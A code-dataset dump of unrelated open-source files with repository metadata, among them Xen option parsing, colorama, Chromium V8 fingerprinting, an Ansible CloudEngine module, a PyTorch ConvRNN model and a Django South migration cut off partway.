print >>sys.stderr, "Error:", msg
sys.exit(1)
def info(self, msg):
"""Print a message to stdout (unless quiet is set).
"""
if self.vals.quiet: return
print msg
def warn(self, msg):
"""Print a warning to stdout.
"""
print >>sys.stderr, "Warning:", msg
def parse(self, argv):
"""Parse arguments argv using the options.
return remaining arguments
"""
self.argv = argv
# hack to work around lack of gnu getopts parsing in python 2.2
args = argv[1:]
xargs = []
while args:
# let getopt parse whatever it feels like -- if anything
try:
(xvals, args) = getopt.getopt(args[0:],
self.short_opts(),
self.long_opts())
except getopt.GetoptError, err:
raise OptionError(str(err), self.use)
#self.err(str(err))
for (k, v) in xvals:
for opt in self.options:
if opt.specify(k, v): break
else:
raise OptionError('Unknown option: %s' % k, self.use)
if not args:
break
# then process the 1st arg
(arg,args) = (args[0], args[1:])
isvar = 0
if '=' in arg:
(k, v) = arg.split('=', 1)
for opt in self.options:
if opt.specify(k, v):
isvar = 1
break
elif self.getdefault(arg):
isvar = 1
if not isvar:
xargs.append(arg)
return xargs
def short_opts(self):
"""Get short options specifier for getopt.
"""
l = []
for x in self.options:
y = x.short_opt()
if not y: continue
l.append(y)
return ''.join(l)
def long_opts(self):
"""Get long options specifier for getopt.
"""
l = []
for x in self.options:
y = x.long_opt()
if not y: continue
l.append(y)
return l
def usage(self):
print 'Usage: ', self.argv[0], self.use or 'OPTIONS'
print
if self.options:
for opt in self.options:
opt.show()
print
print
def var_usage(self):
if self.vars:
print 'The config file defines the following variables:'
for var in self.vars:
var.show()
print
print
def config_usage(self):
if self.imports:
print 'The following are automically imported:'
for x in self.imports:
print ' ', x
print
self.var_usage()
def load_defconfig(self, help=0):
"""Load a defconfig script. Assumes these options set:
'path' search path
'defconfig' script name
"""
for x in [ '' ] + self.vals.path.split(':'):
if x:
p = os.path.join(x, self.vals.defconfig)
else:
p = self.vals.defconfig
if not p.startswith('/'):
p = os.path.join(os.path.curdir, p)
if os.path.exists(p):
self.info('Using config file "%s".' % p)
f = open(p)
is_xml = (f.read(1) == '<')
f.close()
if is_xml:
raise XMLFileError(p)
self.load(p, help)
break
else:
raise OptionError('Unable to open config file: %s' % \
self.vals.defconfig,
self.use)
def load(self, defconfig, help):
"""Load a defconfig file. Local variables in the file
are used to set options with the same names.
Variables are not used to set options that are already specified.
"""
# Create global and local dicts for the file.
# Initialize locals to the vars.
# Use exec to do the standard imports and
# define variables we are passing to the script.
globs = {}
locs = {}
locs.update(self.vars)
cmd = '\n'.join(self.imports +
[ "from xen.xm.help import Vars",
"xm_file = '%s'" % defconfig,
"xm_help = %d" % help,
"xm_vars = Vars(xm_file, xm_help, locals())"
])
exec cmd in globs, locs
try:
execfile(defconfig, globs, locs)
except SyntaxError,e:
raise SyntaxError, \
"Errors were found at line %d while processing %s:\n\t%s"\
%(e.lineno,defconfig,e.text)
except:
if not help: raise
if help:
self.config_usage()
return
# Extract the values set by the script and set the corresponding
# options, if not set on the command line.
vtypes = [ types.StringType,
types.ListType,
types.IntType,
types.FloatType
]
for (k, v) in locs.items():
if self.specified(k): continue
if not(type(v) in vtypes): continue
self.setopt(k, v)
def set_true(opt, k, v):
"""Set an option true."""
opt.set(1)
def set_false(opt, k, v):
"""Set an option false."""
opt.set(0)
def set_bool(opt, k, v):
"""Set a boolean option.
"""
if v in ('yes', 'y'):
opt.set(1)
elif v in ('no', 'n'):
opt.set(0)
else:
opt.opts.err('Invalid value:' +v)
def set_value(opt, k, v):
"""Set an option to a value."""
opt.set(v)
def set_int(opt, k, v):
"""Set an option to an integer value."""
try:
v = int(v)
except:
opt.opts.err('Invalid value: ' + str(v))
opt.set(v)
def set_long(opt, k, v):
"""Set an option to a long integer value."""
try:
v = long(v)
except:
opt.opts.err('Invalid value: ' + str(v))
opt.set(v)
def set_float(opt, k, v):
"""Set an option to a float value."""
try:
v = float(v)
except:
opt.opts.err('Invalid value: ' + str(v))
opt.set(v)
def append_value(opt, k, v):
"""Append a value to a list option."""
opt.append(v)
def set_var(opt, k, v):
"""Set a default script variable.
"""
(var, val) = v.strip().split('=', 1)
opt.opts.setvar(var.strip(), val.strip())
|
gpl-2.0
|
kimegitee/python-koans
|
python2/libs/colorama/ansitowin32.py
|
287
|
6621
|
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
import re
import sys
from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style
from .winterm import WinTerm, WinColor, WinStyle
from .win32 import windll
if windll is not None:
winterm = WinTerm()
def is_a_tty(stream):
return hasattr(stream, 'isatty') and stream.isatty()
class StreamWrapper(object):
'''
Wraps a stream (such as stdout), acting as a transparent proxy for all
attribute access apart from method 'write()', which is delegated to our
Converter instance.
'''
def __init__(self, wrapped, converter):
# double-underscore everything to prevent clashes with names of
# attributes on the wrapped stream object.
self.__wrapped = wrapped
self.__convertor = converter
def __getattr__(self, name):
return getattr(self.__wrapped, name)
def write(self, text):
self.__convertor.write(text)
class AnsiToWin32(object):
'''
Implements a 'write()' method which, on Windows, will strip ANSI character
sequences from the text, and if outputting to a tty, will convert them into
win32 function calls.
'''
ANSI_RE = re.compile('\033\[((?:\d|;)*)([a-zA-Z])')
def __init__(self, wrapped, convert=None, strip=None, autoreset=False):
# The wrapped stream (normally sys.stdout or sys.stderr)
self.wrapped = wrapped
# should we reset colors to defaults after every .write()
self.autoreset = autoreset
# create the proxy wrapping our output stream
self.stream = StreamWrapper(wrapped, self)
on_windows = sys.platform.startswith('win')
# should we strip ANSI sequences from our output?
if strip is None:
strip = on_windows
self.strip = strip
# should we should convert ANSI sequences into win32 calls?
if convert is None:
convert = on_windows and is_a_tty(wrapped)
self.convert = convert
# dict of ansi codes to win32 functions and parameters
self.win32_calls = self.get_win32_calls()
# are we wrapping stderr?
self.on_stderr = self.wrapped is sys.stderr
def should_wrap(self):
'''
True if this class is actually needed. If false, then the output
stream will not be affected, nor will win32 calls be issued, so
wrapping stdout is not actually required. This will generally be
False on non-Windows platforms, unless optional functionality like
autoreset has been requested using kwargs to init()
'''
return self.convert or self.strip or self.autoreset
def get_win32_calls(self):
if self.convert and winterm:
return {
AnsiStyle.RESET_ALL: (winterm.reset_all, ),
AnsiStyle.BRIGHT: (winterm.style, WinStyle.BRIGHT),
AnsiStyle.DIM: (winterm.style, WinStyle.NORMAL),
AnsiStyle.NORMAL: (winterm.style, WinStyle.NORMAL),
AnsiFore.BLACK: (winterm.fore, WinColor.BLACK),
AnsiFore.RED: (winterm.fore, WinColor.RED),
AnsiFore.GREEN: (winterm.fore, WinColor.GREEN),
AnsiFore.YELLOW: (winterm.fore, WinColor.YELLOW),
AnsiFore.BLUE: (winterm.fore, WinColor.BLUE),
AnsiFore.MAGENTA: (winterm.fore, WinColor.MAGENTA),
AnsiFore.CYAN: (winterm.fore, WinColor.CYAN),
AnsiFore.WHITE: (winterm.fore, WinColor.GREY),
AnsiFore.RESET: (winterm.fore, ),
AnsiBack.BLACK: (winterm.back, WinColor.BLACK),
AnsiBack.RED: (winterm.back, WinColor.RED),
AnsiBack.GREEN: (winterm.back, WinColor.GREEN),
AnsiBack.YELLOW: (winterm.back, WinColor.YELLOW),
AnsiBack.BLUE: (winterm.back, WinColor.BLUE),
AnsiBack.MAGENTA: (winterm.back, WinColor.MAGENTA),
AnsiBack.CYAN: (winterm.back, WinColor.CYAN),
AnsiBack.WHITE: (winterm.back, WinColor.GREY),
AnsiBack.RESET: (winterm.back, ),
}
def write(self, text):
if self.strip or self.convert:
self.write_and_convert(text)
else:
self.wrapped.write(text)
self.wrapped.flush()
if self.autoreset:
self.reset_all()
def reset_all(self):
if self.convert:
self.call_win32('m', (0,))
elif is_a_tty(self.wrapped):
self.wrapped.write(Style.RESET_ALL)
def write_and_convert(self, text):
'''
Write the given text to our wrapped stream, stripping any ANSI
sequences from the text, and optionally converting them into win32
calls.
'''
cursor = 0
for match in self.ANSI_RE.finditer(text):
start, end = match.span()
self.write_plain_text(text, cursor, start)
self.convert_ansi(*match.groups())
cursor = end
self.write_plain_text(text, cursor, len(text))
def write_plain_text(self, text, start, end):
if start < end:
self.wrapped.write(text[start:end])
self.wrapped.flush()
def convert_ansi(self, paramstring, command):
if self.convert:
params = self.extract_params(paramstring)
self.call_win32(command, params)
def extract_params(self, paramstring):
def split(paramstring):
for p in paramstring.split(';'):
if p != '':
yield int(p)
return tuple(split(paramstring))
def call_win32(self, command, params):
if params == []:
params = [0]
if command == 'm':
for param in params:
if param in self.win32_calls:
func_args = self.win32_calls[param]
func = func_args[0]
args = func_args[1:]
kwargs = dict(on_stderr=self.on_stderr)
func(*args, **kwargs)
elif command in ('H', 'f'): # set cursor position
func = winterm.set_cursor_position
func(params, on_stderr=self.on_stderr)
elif command in ('J'):
func = winterm.erase_data
func(params, on_stderr=self.on_stderr)
elif command == 'A':
if params == () or params == None:
num_rows = 1
else:
num_rows = params[0]
func = winterm.cursor_up
func(num_rows, on_stderr=self.on_stderr)
|
mit
|
ltilve/chromium
|
gin/fingerprint/fingerprint_v8_snapshot.py
|
64
|
2442
|
#!/usr/bin/env python
#
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Fingerprints the V8 snapshot blob files.
Constructs a SHA256 fingerprint of the V8 natives and snapshot blob files and
creates a .cc file which includes these fingerprint as variables.
"""
import hashlib
import optparse
import os
import sys
_HEADER = """// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// This file was generated by fingerprint_v8_snapshot.py.
namespace gin {
"""
_FOOTER = """
} // namespace gin
"""
def FingerprintFile(file_path):
input_file = open(file_path, 'rb')
sha256 = hashlib.sha256()
while True:
block = input_file.read(sha256.block_size)
if not block:
break
sha256.update(block)
return sha256.digest()
def WriteFingerprint(output_file, variable_name, fingerprint):
output_file.write('\nextern const unsigned char %s[] = { ' % variable_name)
for byte in fingerprint:
output_file.write(str(ord(byte)) + ', ')
output_file.write('};\n')
def WriteOutputFile(natives_fingerprint,
snapshot_fingerprint,
output_file_path):
output_dir_path = os.path.dirname(output_file_path)
if not os.path.exists(output_dir_path):
os.makedirs(output_dir_path)
output_file = open(output_file_path, 'w')
output_file.write(_HEADER)
WriteFingerprint(output_file, 'g_natives_fingerprint', natives_fingerprint)
output_file.write('\n')
WriteFingerprint(output_file, 'g_snapshot_fingerprint', snapshot_fingerprint)
output_file.write(_FOOTER)
def main():
parser = optparse.OptionParser()
parser.add_option('--snapshot_file',
help='The input V8 snapshot blob file path.')
parser.add_option('--natives_file',
help='The input V8 natives blob file path.')
parser.add_option('--output_file',
help='The path for the output cc file which will be write.')
options, _ = parser.parse_args()
natives_fingerprint = FingerprintFile(options.natives_file)
snapshot_fingerprint = FingerprintFile(options.snapshot_file)
WriteOutputFile(
natives_fingerprint, snapshot_fingerprint, options.output_file)
return 0
if __name__ == '__main__':
sys.exit(main())
|
bsd-3-clause
|
shiblon/pytour
|
static/js/pypyjs/pypy-nojit.js-0.3.1/lib/modules/test/test_coding.py
|
121
|
1212
|
import test.test_support, unittest
import os
class CodingTest(unittest.TestCase):
def test_bad_coding(self):
module_name = 'bad_coding'
self.verify_bad_module(module_name)
def test_bad_coding2(self):
module_name = 'bad_coding2'
self.verify_bad_module(module_name)
def verify_bad_module(self, module_name):
self.assertRaises(SyntaxError, __import__, 'test.' + module_name)
path = os.path.dirname(__file__)
filename = os.path.join(path, module_name + '.py')
with open(filename) as fp:
text = fp.read()
self.assertRaises(SyntaxError, compile, text, filename, 'exec')
def test_error_from_string(self):
# See http://bugs.python.org/issue6289
input = u"# coding: ascii\n\N{SNOWMAN}".encode('utf-8')
with self.assertRaises(SyntaxError) as c:
compile(input, "<string>", "exec")
expected = "'ascii' codec can't decode byte 0xe2 in position 16: " \
"ordinal not in range(128)"
self.assertTrue(c.exception.args[0].startswith(expected))
def test_main():
test.test_support.run_unittest(CodingTest)
if __name__ == "__main__":
test_main()
|
apache-2.0
|
cetic/ansible
|
lib/ansible/modules/network/cloudengine/ce_snmp_location.py
|
39
|
6774
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.0'}
DOCUMENTATION = '''
---
module: ce_snmp_location
version_added: "2.4"
short_description: Manages SNMP location configuration on HUAWEI CloudEngine switches.
description:
- Manages SNMP location configurations on HUAWEI CloudEngine switches.
author:
- wangdezhuang (@CloudEngine-Ansible)
options:
location:
description:
- Location information.
required: true
default: null
state:
description:
- Manage the state of the resource.
required: false
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- name: CloudEngine snmp location test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Config SNMP location"
ce_snmp_location:
state: present
location: nanjing China
provider: "{{ cli }}"
- name: "Remove SNMP location"
ce_snmp_location:
state: absent
location: nanjing China
provider: "{{ cli }}"
'''
RETURN = '''
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"location": "nanjing China",
"state": "present"}
existing:
description: k/v pairs of existing aaa server
returned: always
type: dict
sample: {}
end_state:
description: k/v pairs of aaa params after module execution
returned: always
type: dict
sample: {"location": "nanjing China"}
updates:
description: command sent to the device
returned: always
type: list
sample: ["snmp-agent sys-info location nanjing China"]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ce import get_config, load_config, ce_argument_spec
class SnmpLocation(object):
""" Manages SNMP location configuration """
def __init__(self, **kwargs):
""" Class init """
# module
argument_spec = kwargs["argument_spec"]
self.spec = argument_spec
self.module = AnsibleModule(argument_spec=self.spec, supports_check_mode=True)
# config
self.cur_cfg = dict()
# module args
self.state = self.module.params['state']
self.location = self.module.params['location']
# state
self.changed = False
self.updates_cmd = list()
self.results = dict()
self.proposed = dict()
self.existing = dict()
self.end_state = dict()
def check_args(self):
""" Check invalid args """
if self.location:
if len(self.location) > 255 or len(self.location) < 1:
self.module.fail_json(
msg='Error: The len of location %s is out of [1 - 255].' % self.location)
else:
self.module.fail_json(
msg='Error: The len of location is 0.')
def get_proposed(self):
""" Get proposed state """
self.proposed["state"] = self.state
if self.location:
self.proposed["location"] = self.location
def get_existing(self):
""" Get existing state """
tmp_cfg = self.cli_get_config()
if tmp_cfg:
temp_data = tmp_cfg.split(r"location ")
self.cur_cfg["location"] = temp_data[1]
self.existing["location"] = temp_data[1]
def get_end_state(self):
""" Get end state """
tmp_cfg = self.cli_get_config()
if tmp_cfg:
temp_data = tmp_cfg.split(r"location ")
self.end_state["location"] = temp_data[1]
def cli_load_config(self, commands):
""" Load config by cli """
if not self.module.check_mode:
load_config(self.module, commands)
def cli_get_config(self):
""" Get config by cli """
regular = "| include snmp | include location"
flags = list()
flags.append(regular)
tmp_cfg = get_config(self.module, flags)
return tmp_cfg
def set_config(self):
""" Set configure by cli """
cmd = "snmp-agent sys-info location %s" % self.location
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def undo_config(self):
""" Undo configure by cli """
cmd = "undo snmp-agent sys-info location"
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def work(self):
""" Main work function """
self.check_args()
self.get_proposed()
self.get_existing()
if self.state == "present":
if "location" in self.cur_cfg.keys() and self.location == self.cur_cfg["location"]:
pass
else:
self.set_config()
else:
if "location" in self.cur_cfg.keys() and self.location == self.cur_cfg["location"]:
self.undo_config()
self.get_end_state()
self.results['changed'] = self.changed
self.results['proposed'] = self.proposed
self.results['existing'] = self.existing
self.results['end_state'] = self.end_state
self.results['updates'] = self.updates_cmd
self.module.exit_json(**self.results)
def main():
""" Module main """
argument_spec = dict(
state=dict(choices=['present', 'absent'], default='present'),
location=dict(type='str', required=True)
)
argument_spec.update(ce_argument_spec)
module = SnmpLocation(argument_spec=argument_spec)
module.work()
if __name__ == '__main__':
main()
|
gpl-3.0
|
Tatsh/Clementine
|
dist/codesign.py
|
10
|
1320
|
#!/usr/bin/python2
# Emulates the behaviour of codesign --deep which is missing on OS X < 10.9
import os
import re
import subprocess
import sys
def SignPath(path, developer_id, deep=True):
args = [
'codesign',
'--preserve-metadata=identifier,entitlements,resource-rules,requirements',
'-s', developer_id,
'-fv', path
]
if deep:
args.append('--deep')
subprocess.check_call(args)
def main():
if len(sys.argv) != 3:
print 'Usage: %s <developer id> <app bundle>' % sys.argv[0]
sys.exit(1)
developer_id = sys.argv[1]
app_bundle = sys.argv[2]
for root, dirs, files in os.walk(app_bundle):
for dir in dirs:
if re.search(r'\.framework$', dir):
SignPath(os.path.join(root, dir), developer_id)
for file in files:
if re.search(r'\.(dylib|so)$', file):
SignPath(os.path.join(root, file), developer_id)
elif re.match(r'(clementine-spotifyblob|clementine-tagreader|gst-plugin-scanner)', file):
SignPath(os.path.join(root, file), developer_id)
SignPath(app_bundle, developer_id, deep=False)
# Verify the signatures are valid.
subprocess.check_call([
'codesign', '--verify', '--verbose=4', app_bundle])
subprocess.check_call([
'spctl', '--assess', '--verbose=4', app_bundle])
if __name__ == '__main__':
main()
|
gpl-3.0
|
aozima/rt-thread
|
bsp/taihu/rtconfig.py
|
52
|
1285
|
import os
# toolchains options
ARCH='ppc'
CPU='ppc405'
CROSS_TOOL='gcc'
TextBase = '0x00000000'
PLATFORM = 'gcc'
EXEC_PATH = 'C:/Program Files/CodeSourcery/Sourcery G++ Lite/bin'
BUILD = 'debug'
if os.getenv('RTT_EXEC_PATH'):
EXEC_PATH = os.getenv('RTT_EXEC_PATH')
if PLATFORM == 'gcc':
# toolchains
PREFIX = 'powerpc-eabi-'
CC = PREFIX + 'gcc'
CXX = PREFIX + 'g++'
AS = PREFIX + 'gcc'
AR = PREFIX + 'ar'
LINK = PREFIX + 'gcc'
TARGET_EXT = 'elf'
SIZE = PREFIX + 'size'
OBJDUMP = PREFIX + 'objdump'
OBJCPY = PREFIX + 'objcopy'
DEVICE = ' -mcpu=405 -mno-multiple -mno-string -mno-update -fno-exceptions -fno-builtin -msoft-float'
CFLAGS = DEVICE + ' -D__KERNEL__'
AFLAGS = '-D__ASSEMBLY__ -fno-exceptions -fno-builtin -mregnames -c -Wall -Xassembler -m405 -msoft-float -ffunction-sections'
LFLAGS = DEVICE + ' -Wl,--gc-sections,--cref,-Map=rtthread.map -T taihu.lds' + ' -Ttext=' + TextBase
CPATH = ''
LPATH = ''
if BUILD == 'debug':
CFLAGS += ' -O0 -gdwarf-2'
AFLAGS += ' -gdwarf-2'
else:
CFLAGS += ' -O2'
DASM_ACTION = OBJDUMP + ' -d rtthread-taihu.elf > rtt.asm\n'
POST_ACTION = OBJCPY + ' -O binary $TARGET rtthread.bin\n' + SIZE + ' $TARGET \n' # + DASM_ACTION
|
gpl-2.0
|
blefaudeux/Pinta
|
pinta/model/model_rnn.py
|
1
|
2323
|
import logging
from typing import List
import numpy as np
import torch
import torch.nn as nn
from pinta.model.model_base import NN
LOG = logging.getLogger("ConvRNN")
class ConvRNN(NN):
"""
Combination of a convolutional front end and an RNN (GRU) layer below
>> see https://gist.github.com/spro/c87cc706625b8a54e604fb1024106556
"""
def __init__(
self,
logdir: str,
input_size: int,
hidden_size: int,
kernel_sizes: List[int],
n_gru_layers: int,
output_size: int,
filename=None,
tuning_input_size: int = -1,
):
super().__init__(logdir)
# ----
# Define the model
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.gru_layers = n_gru_layers
# Conv front end
self.conv1 = nn.Conv1d(input_size, hidden_size, kernel_size=kernel_sizes[0])
self.conv2 = nn.Conv1d(hidden_size, hidden_size, kernel_size=kernel_sizes[1])
self.relu = nn.ReLU()
# GRU / LSTM layers
# Requires [batch, seq, inputs]
self.gru = nn.GRU(
hidden_size, hidden_size, n_gru_layers, dropout=0.01, batch_first=True
)
# Ends with a fully connected layer
self.out = nn.Linear(hidden_size, self.output_size)
# Load from trained NN if required
if filename is not None:
self._valid = self.load(filename)
if self._valid:
return
LOG.warning("Could not load the specified net, computing it from scratch")
def forward(self, inputs, hidden=None):
# Run through Conv1d and Pool1d layers
r1 = self.relu(self.conv1(inputs))
r2 = self.relu(self.conv2(r1))
# GRU/LSTM layer expects [batch, seq, inputs]
r2 = r2.transpose(1, 2)
output_rnn, hidden_out = self.gru(r2, hidden)
output = self.out(output_rnn[:, -1, :].squeeze())
return output, hidden_out
def get_layer_weights(self):
return self.conv1.weight
def _get_conv_out(self, shape):
# Useful to compute the shape out of the conv blocks
# (including eventual padding..)
o = self.conv(torch.zeros(1, *shape))
return int(np.prod(o.size()))
|
gpl-3.0
|
mmalyska/eve-wspace
|
evewspace/SiteTracker/migrations/0003_auto__add_systemweight.py
|
17
|
15303
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'SystemWeight'
db.create_table('SiteTracker_systemweight', (
('system', self.gf('django.db.models.fields.related.OneToOneField')(related_name='st_weight', unique=True, primary_key=True, to=orm['Map.System'])),
('weight', self.gf('django.db.models.fields.FloatField')()),
))
db.send_create_signal('SiteTracker', ['SystemWeight'])
def backwards(self, orm):
# Deleting model 'SystemWeight'
db.delete_table('SiteTracker_systemweight')
models = {
'Map.system': {
'Meta': {'object_name': 'System', '_ormbases': ['core.SystemData']},
'first_visited': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'info': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'last_visited': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'lastscanned': ('django.db.models.fields.DateTimeField', [], {}),
'npckills': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'occupied': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'podkills': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'shipkills': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'sysclass': ('django.db.models.fields.IntegerField', [], {}),
'systemdata_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.SystemData']", 'unique': 'True', 'primary_key': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'SiteTracker.claim': {
'Meta': {'object_name': 'Claim'},
'bonus': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'period': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'claims'", 'to': "orm['SiteTracker.ClaimPeriod']"}),
'shareclaimed': ('django.db.models.fields.FloatField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'claims'", 'to': "orm['auth.User']"})
},
'SiteTracker.claimperiod': {
'Meta': {'object_name': 'ClaimPeriod'},
'closetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'endtime': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'loothauledby': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'loothauled'", 'null': 'True', 'to': "orm['auth.User']"}),
'lootsoldby': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'lootsold'", 'null': 'True', 'to': "orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'starttime': ('django.db.models.fields.DateTimeField', [], {})
},
'SiteTracker.fleet': {
'Meta': {'object_name': 'Fleet'},
'current_boss': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'currently_bossing'", 'to': "orm['auth.User']"}),
'ended': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'initial_boss': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bossfleets'", 'to': "orm['auth.User']"}),
'roles_needed': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'fleets_need'", 'symmetrical': 'False', 'to': "orm['SiteTracker.SiteRole']"}),
'started': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'system': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stfleets'", 'to': "orm['Map.System']"})
},
'SiteTracker.payoutentry': {
'Meta': {'object_name': 'PayoutEntry'},
'claim': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'payout'", 'to': "orm['SiteTracker.Claim']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'iskshare': ('django.db.models.fields.BigIntegerField', [], {}),
'report': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'entries'", 'to': "orm['SiteTracker.PayoutReport']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'payouts'", 'to': "orm['auth.User']"})
},
'SiteTracker.payoutreport': {
'Meta': {'object_name': 'PayoutReport'},
'createdby': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'payoutreports'", 'to': "orm['auth.User']"}),
'datepaid': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'grossprofit': ('django.db.models.fields.BigIntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'period': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'reports'", 'to': "orm['SiteTracker.ClaimPeriod']"})
},
'SiteTracker.siterecord': {
'Meta': {'object_name': 'SiteRecord'},
'boss': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sitescredited'", 'to': "orm['auth.User']"}),
'fleet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sites'", 'to': "orm['SiteTracker.Fleet']"}),
'fleetsize': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'raw_points': ('django.db.models.fields.IntegerField', [], {}),
'site_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sitesrun'", 'to': "orm['SiteTracker.SiteType']"}),
'system': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sitescompleted'", 'to': "orm['Map.System']"}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'weighted_points': ('django.db.models.fields.IntegerField', [], {})
},
'SiteTracker.siterole': {
'Meta': {'object_name': 'SiteRole'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'long_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'short_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'})
},
'SiteTracker.sitetype': {
'Meta': {'object_name': 'SiteType'},
'defunct': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'longname': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'shortname': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '8'})
},
'SiteTracker.siteweight': {
'Meta': {'object_name': 'SiteWeight'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'raw_points': ('django.db.models.fields.IntegerField', [], {}),
'site_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'weights'", 'to': "orm['SiteTracker.SiteType']"}),
'sysclass': ('django.db.models.fields.IntegerField', [], {})
},
'SiteTracker.systemweight': {
'Meta': {'object_name': 'SystemWeight'},
'system': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'st_weight'", 'unique': 'True', 'primary_key': 'True', 'to': "orm['Map.System']"}),
'weight': ('django.db.models.fields.FloatField', [], {})
},
'SiteTracker.userlog': {
'Meta': {'object_name': 'UserLog'},
'fleet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'members'", 'to': "orm['SiteTracker.Fleet']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'jointime': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'leavetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sitetrackerlogs'", 'to': "orm['auth.User']"})
},
'SiteTracker.usersite': {
'Meta': {'object_name': 'UserSite'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pending': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'members'", 'to': "orm['SiteTracker.SiteRecord']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sites'", 'to': "orm['auth.User']"})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
